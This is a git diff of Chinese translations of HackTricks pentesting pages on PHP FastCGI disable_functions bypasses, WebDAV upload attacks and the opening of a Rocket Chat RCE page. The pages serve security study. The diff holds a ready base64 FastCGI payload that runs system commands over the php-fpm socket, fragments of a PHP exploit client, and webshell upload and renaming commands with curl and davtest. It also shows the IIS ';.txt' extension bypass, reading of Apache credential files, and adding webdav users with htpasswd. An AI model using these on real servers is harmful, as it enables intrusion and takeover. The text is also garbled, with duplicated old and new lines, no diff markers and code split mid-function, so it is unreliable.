[FastCGI](https://en.wikipedia.org/wiki/FastCGI)是一种更新的Web技术是[CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface)的改进版本,主要功能保持不变。
[FastCGI](https://en.wikipedia.org/wiki/FastCGI) 是一种较新的网络技术,是改进版的 [CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface)主要功能保持不变。
开发FastCGI的原因是Web应用程序的快速发展和复杂性以及为了解决CGI技术的可伸缩性缺陷。为了满足这些要求[Open Market](http://en.wikipedia.org/wiki/Open\_Market)推出了**FastCGI - 具有增强功能的CGI技术的高性能版本**。
开发 FastCGI 的需求是由于应用程序的快速发展和复杂性,以及为了解决 CGI 技术的可扩展性不足。为了满足这些需求,[Open Market](http://en.wikipedia.org/wiki/Open\_Market) 推出了 **FastCGI——一种具有增强功能的高性能 CGI 技术版本。**
## disable_functions绕过
## disable\_functions bypass
可以利用FastCGI运行PHP代码避开`disable_functions`的限制。
可以通过滥用 FastCGI 来运行 PHP 代码,避免 `disable_functions` 限制。
### 通过Gopherus
### 通过 Gopherus
{% hint style="danger" %}
我不确定这在现代版本中是否有效,因为我尝试过一次,但没有执行任何操作。如果您对此有更多信息,请通过\[**PEASS & HackTricks电报群**]\([**https://t.me/peass**](https://t.me/peass))或Twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks\_live**](https://twitter.com/hacktricks\_live))**联系我**。
我不确定这在现代版本中是否有效,因为我尝试过一次,但没有执行任何内容。如果您有更多信息,请通过 \[**PEASS & HackTricks Telegram 群组联系我**]\([**https://t.me/peass**](https://t.me/peass))Twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks\_live**](https://twitter.com/hacktricks\_live))**.**
{% endhint %}
使用[Gopherus](https://github.com/tarunkant/Gopherus)可以生成一个有效负载发送到FastCGI监听器并执行任意命令:
使用 [Gopherus](https://github.com/tarunkant/Gopherus) 可以生成一个有效负载发送到 FastCGI 监听器并执行任意命令:
![](<../../../../.gitbook/assets/image (227).png>)
然后您可以获取url编码的有效负载并解码它然后将其转换为base64\[**例如使用这个CyberChef的配方**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). 然后将base64复制/粘贴到此php代码中
然后,您可以抓取 urlencoded 有效负载并解码,将其转换为 base64\[**例如使用这个 cyberchef 的配方**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNpeUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNpeUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). 然后将 base64 复制粘贴到以下 PHP 代码中:
```php
<?php
$fp = fsockopen("unix:///var/run/php/php7.0-fpm.sock", -1, $errno, $errstr, 30); fwrite($fp,base64_decode("AQEAAQAIAAAAAQAAAAAAAAEEAAEBBAQADxBTRVJWRVJfU09GVFdBUkVnbyAvIGZjZ2ljbGllbnQgCwlSRU1PVEVfQUREUjEyNy4wLjAuMQ8IU0VSVkVSX1BST1RPQ09MSFRUUC8xLjEOAkNPTlRFTlRfTEVOR1RINzYOBFJFUVVFU1RfTUVUSE9EUE9TVAlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUgPSBPbgpkaXNhYmxlX2Z1bmN0aW9ucyA9IAphdXRvX3ByZXBlbmRfZmlsZSA9IHBocDovL2lucHV0DxdTQ1JJUFRfRklMRU5BTUUvdmFyL3d3dy9odG1sL2luZGV4LnBocA0BRE9DVU1FTlRfUk9PVC8AAAAAAQQAAQAAAAABBQABAEwEADw/cGhwIHN5c3RlbSgnd2hvYW1pID4gL3RtcC93aG9hbWkudHh0Jyk7ZGllKCctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0KJyk7Pz4AAAAA"));
```
### PHP exploit
上传并访问此脚本后,漏洞将被发送到 FastCGI禁用 `disable_functions`),并且 **指定的命令将被执行**
### PHP 漏洞
{% hint style="danger" %}
我不确定这是否适用于现代版本因为我尝试过一次但无法执行任何操作。实际上我成功看到了来自FastCGI执行的 `phpinfo()` 指示 `disable_functions` 为空,但是 PHP以某种方式仍在阻止我执行任何先前禁用的函数。如果您对此有更多信息,请通过 \[**PEASS & HackTricks 电报群**]\([**https://t.me/peass**](https://t.me/peass)) 或推特 \[**@carlospolopm**]\([**https://twitter.com/hacktricks\_live**](https://twitter.com/hacktricks\_live)) 联系我**
我不确定这在现代版本中是否有效,因为我尝试过一次,但无法执行任何内容。实际上,我发现 FastCGI 执行的 `phpinfo()` 指示 `disable_functions` 是空的,但 PHP以某种方式仍然阻止我执行任何先前禁用的函数。如果您有更多信息,请通过 \[**PEASS & HackTricks telegram group here**]\([**https://t.me/peass**](https://t.me/peass)), 或 twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks\_live**](https://twitter.com/hacktricks\_live))** 联系我**
{% endhint %}
代码来自[这里](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy)。
代码来自 [这里](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
```php
<?php
/**
@ -324,7 +328,6 @@ throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
*
* @param array $params Array of parameters
* @param String $stdin Content
```php
* @return String
*/
public function request(array $params, $stdin)
@ -374,7 +377,7 @@ return $response;
<?php
// real exploit start here
if (!isset($_REQUEST['cmd'])) {
die("检查您的输入\n");
die("Check your input\n");
}
if (!isset($_REQUEST['filepath'])) {
$filepath = __FILE__;
@ -412,30 +415,45 @@ $params = array(
echo $client->request($params, $code)."\n";
?>
```
使用前面的函数,您会发现函数**`system`**仍然被**禁用**,但**`phpinfo()`**显示**`disable_functions`**是**空的**
使用之前的函数,你会看到函数 **`system`** **仍然被禁用**,但 **`phpinfo()`** 显示 **`disable_functions`** **为空**
![](<../../../../.gitbook/assets/image (188).png>)
![](<../../../../.gitbook/assets/image (713).png>)
**因此我认为您只能通过php `.ini`配置文件设置`disable_functions`,而`PHP_VALUE`不会覆盖该设置。**
**所以,我认为你只能通过 php `.ini` 配置文件设置 `disable_functions`,而 PHP\_VALUE 不会覆盖该设置。**
### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi)
这是一个用于利用fastcgi协议绕过`open_basedir`和`disable_functions`的php脚本。\
它将帮助您绕过严格的`disable_functions`以通过加载恶意扩展实现RCE。\
可以在这里访问它:[https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi),或者在这里找到一个稍作修改和改进的版本[https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi)
这是一个利用 fastcgi 协议绕过 `open_basedir` `disable_functions` php 脚本。\
它将帮助你通过加载恶意扩展来绕过严格的 `disable_functions` 以实现 RCE。\
可以在这里访问它:[https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) 或稍微修改和改进的版本在这里[https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi)
您会发现这个漏洞利用与前面的代码非常相似但它不是尝试使用PHP_VALUE绕过`disable_functions`,而是尝试**加载外部PHP模块**以使用变量`PHP_ADMIN_VALUE`中的参数`extension_dir`和`extension`执行代码。\
**注意1**您可能需要使用与服务器相同的PHP版本**重新编译**扩展您可以在phpinfo的输出中检查):
你会发现这个利用与之前的代码非常相似,但它不是尝试使用 PHP\_VALUE 绕过 `disable_functions`,而是尝试 **加载一个外部 PHP 模块** 以使用变量 `PHP_ADMIN_VALUE` 中的参数 `extension_dir``extension` 执行代码。\
**注意1**你可能需要 **重新编译** 扩展,使用 **服务器正在使用的相同 PHP 版本**(你可以在 phpinfo 的输出中检查):
![](<../../../../.gitbook/assets/image (180).png>)
{% hint style="danger" %}
**注意2**:我设法通过将`extension_dir`和`extension`值插入到PHP `.ini`配置文件中(这是您无法攻击服务器时无法做的事情)使其工作。但由于某种原因,当使用此漏洞利用并从`PHP_ADMIN_VALUE`变量加载扩展时,进程就会死掉,所以我不知道这种技术是否仍然有效。
**注意2**:我通过在 PHP `.ini` 配置文件中插入 `extension_dir``extension` 值使其工作(这是你在攻击服务器时无法做到的)。但出于某种原因,当使用此利用并从 `PHP_ADMIN_VALUE` 变量加载扩展时,进程就死掉了,所以我不知道这个技术是否仍然有效。
{% endhint %}
### PHP-FPM远程代码执行漏洞CVE-201911043
### PHP-FPM 远程代码执行漏洞 (CVE-201911043)
您可以利用[**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam)这个漏洞并使用此docker环境进行测试[https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043)。\
您还可以在这里找到有关漏洞的分析[**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**。**
你可以使用 [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) 利用此漏洞,并使用此 docker 环境进行测试:[https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043)。\
你还可以在 [**这里**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)** 找到对该漏洞的分析。**
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

86
network-services-pentesting/pentesting-web/put-method-webdav.md
View file

@ -3,51 +3,51 @@
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 来轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
当处理启用了 **WebDav 的 HTTP 服务器** 时,如果您拥有正确的 **凭据**(通常通过 **HTTP 基本身份验证**验证),则可以对文件进行 **操作**。通常,控制这样的服务器往往涉及 **上传和执行 Webshell**
在处理 **启用 WebDav 的 HTTP 服务器** 时,如果您拥有正确的 **凭据**,通常通过 **HTTP 基本认证** 验证,则可以 **操纵文件**。控制此类服务器通常涉及 **上传和执行 webshell**。
访问 WebDav 服务器通常需要 **有效凭据**使用 [**WebDav 暴力破解**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) 是获取这些凭据的常见方法之一
访问 WebDav 服务器通常需要 **有效凭据**[**WebDav 暴力破解**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) 是获取它们的常用方法
为了克服文件上传的限制,特别是那些阻止服务器端脚本执行的限制,您可以:
* 如果没有受限制,直接**上传**具有**可执行扩展名**的文件。
* 将已上传的非可执行文件(如 .txt**重命名**为可执行扩展名。
* **复制**已上传的非可执行文件,将其扩展名更改为可执行的扩展名。
* 如果没有限制,**直接上传** 带有 **可执行扩展名** 的文件。
* **重命名** 上传的非可执行文件(如 .txt为可执行扩展名。
* **复制** 上传的非可执行文件,将其扩展名更改为可执行的扩展名。
## DavTest
**Davtest** 尝试**上传具有不同扩展名的多个文件**,并**检查**是否**执行**了该扩展名
**Davtest** 尝试 **上传多个不同扩展名的文件****检查** 扩展名是否 **被执行**
```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
```
```markdown
![](<../../.gitbook/assets/image (851).png>)
这并不意味着 **.txt** 和 **.html 扩展名被执行**。这意味着你可以通过网络访问这些文件。
这并不意味着 **.txt** 和 **.html 扩展名被执行**。这意味着你可以 **通过网络访问这些文件**
## Cadaver
你可以使用这个工具来**连接到 WebDav** 服务器并**手动执行**操作(如**上传**、**移动**或**删除**)。
```
你可以使用这个工具 **连接到 WebDav** 服务器并执行操作(如 **上传**、**移动** 或 **删除** **手动**
```
cadaver <IP>
```
@ -62,25 +62,25 @@ curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 来轻松构建和**自动化**由全球**最先进**的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
## IIS5/6 WebDav漏洞
## IIS5/6 WebDav 漏洞
这个漏洞非常有趣。**WebDav** 不允许**上传**或**重命名**扩展名为 **.asp** 的文件。但是你可以通过在文件名末尾**添加** **";.txt"** 来**绕过**这个限制,文件将被执行为 .asp 文件(你也可以使用 ".html" 代替 ".txt",但**不要忘记 ";"**)。
这个漏洞非常有趣。**WebDav** 不允许 **上传****重命名** 扩展名为 **.asp** 的文件。但你可以通过在名称末尾 **添加** **";.txt"** 来 **绕过** 这个限制,文件将被 **执行**,就像它是一个 .asp 文件(你也可以 **使用 ".html" 而不是 ".txt"**,但 **不要忘记 ";"**)。
然后,你可以将你的 shell 上传为 ".**txt" 文件**,并将其**复制/移动**为 ".asp;.txt" 文件。通过 Web 服务器访问该文件,它将被**执行**cadaver 会说移动操作失败,但实际上是成功的)。
然后你可以将你的 shell 作为一个 ".**txt" 文件** **上传**,并 **复制/移动** 到一个 ".asp;.txt" 文件。通过网络服务器访问该文件时,它将被 **执行**cadaver 会说移动操作没有成功,但实际上是成功的)。
![](<../../.gitbook/assets/image (1092).png>)
## 提交凭据
## 后置凭证
如果 Webdav 使用的是 Apache 服务器,你应该查看 Apache 中配置的站。通常\
如果 Webdav 使用的是 Apache 服务器,你应该查看 Apache 中配置的站。通常:\
_**/etc/apache2/sites-enabled/000-default**_
在其中你可能会找到类似以下内容:
在其中你可能会找到类似内容:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
@ -91,42 +91,44 @@ AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
```
正如您所看到的,这里有包含**webdav**服务器有效**凭证**的文件:
如您所见,存在具有有效**凭据**的**webdav**服务器的文件:
```
/etc/apache2/users.password
```
在这类文件中,你会找到**用户名**和**密码的哈希值**。这些是 webdav 服务器用来验证用户身份的凭据。
在这类文件中,您将找到 **用户名****密码****哈希**。这些是 webdav 服务器用于验证用户的凭据。
你可以尝试**破解**它们,或者如果出于某种原因你想要**访问**这个**webdav**服务器,也可以**添加更多**凭据
您可以尝试 **破解** 它们,或者如果出于某种原因您想要 **访问** **webdav** 服务器,可以 **添加更多**
```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```
要检查新凭据是否有效,可以执行以下操作
要检查新凭据是否有效,可以执行:
```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```
## 参考
## References
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}

46
network-services-pentesting/pentesting-web/rocket-chat.md
View file

@ -1,18 +1,20 @@
# Rocket Chat
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,20 +22,20 @@
## RCE
如果您是 Rocket Chat 内的管理员,您可以获得 RCE。
如果你是 Rocket Chat 的管理员,你可以获得 RCE。
* 转到**`Integrations`**,选择**`New Integration`**,并选择任何一个**`Incoming WebHook`** 或 **`Outgoing WebHook`**。
